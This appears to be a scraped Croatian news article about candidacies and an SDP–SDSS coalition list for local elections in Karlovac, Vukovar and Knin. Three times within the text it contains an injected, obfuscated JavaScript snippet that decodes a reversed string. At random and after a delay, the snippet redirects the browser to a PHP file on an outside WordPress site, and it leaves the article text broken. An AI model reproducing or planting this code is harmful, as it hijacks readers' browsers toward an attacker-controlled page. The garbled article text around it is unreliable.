Mihajlović predao dožupansku izbornu kandidaturu

tom pravcu u svim stranačkim organizacijama.
$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}to”>Dejan Mihajlović danas popodne županijskom izbvornom povjerenstvu u Karlovcu predao je kandidaturu za zamjenika župana Karlovačke županije. Za potrebe kandidature sakupljeno je oko hiljadu potpisa, te se očekuje uvjerljiva pobjeda 16. maja. Predaja liste za županijsku skupštinu dogovorena je za  srijedu u 9 sati.
$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}to”>Juče je predana kandidatura za Gradsko vijeće Vukovara, a listu je predao predsjednik vukovarske organizacije Srđan Kolar.
$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}to”>

U Šibensko-kninskoj županiji na ove izbore SDP i SDSS će u Kninu i Drnišu izaći sa zajedničkom koalicijskom listom za Gradsko vijeće, kojoj će se u Kninu pridružiti i Radnička fronta. Listu će u Kninu nositi Anja Šimpraga koja će biti i kandidatkinja nove koalicije za kninsku gradonačelnicu.

– Netko će reći da s ovom suradnjom pomažemo Marku Jeliću, netko će reći da pomažemo HDZ-u, a ja ću reći da je došlo vrijeme da pokušamo pomoći ovim ljudima koji ovdje žive – kaže Anja Šimpraga, komentirajući sporazum o suradnji sa SDP-om.

Napominje, također, da joj je cilj ojačati kninsku organizaciju SDSS-a i na izborima osvojiti što više glasova kako bi bili faktor odlučivanja u gradu, “i tko god pobijedio, da ubuduće o Kninu i nas nešto pita”.

– Mislim da je ovaj Sporazum o suradnji sa SDP-om zalog za budućnost – poručuje Šimpraga.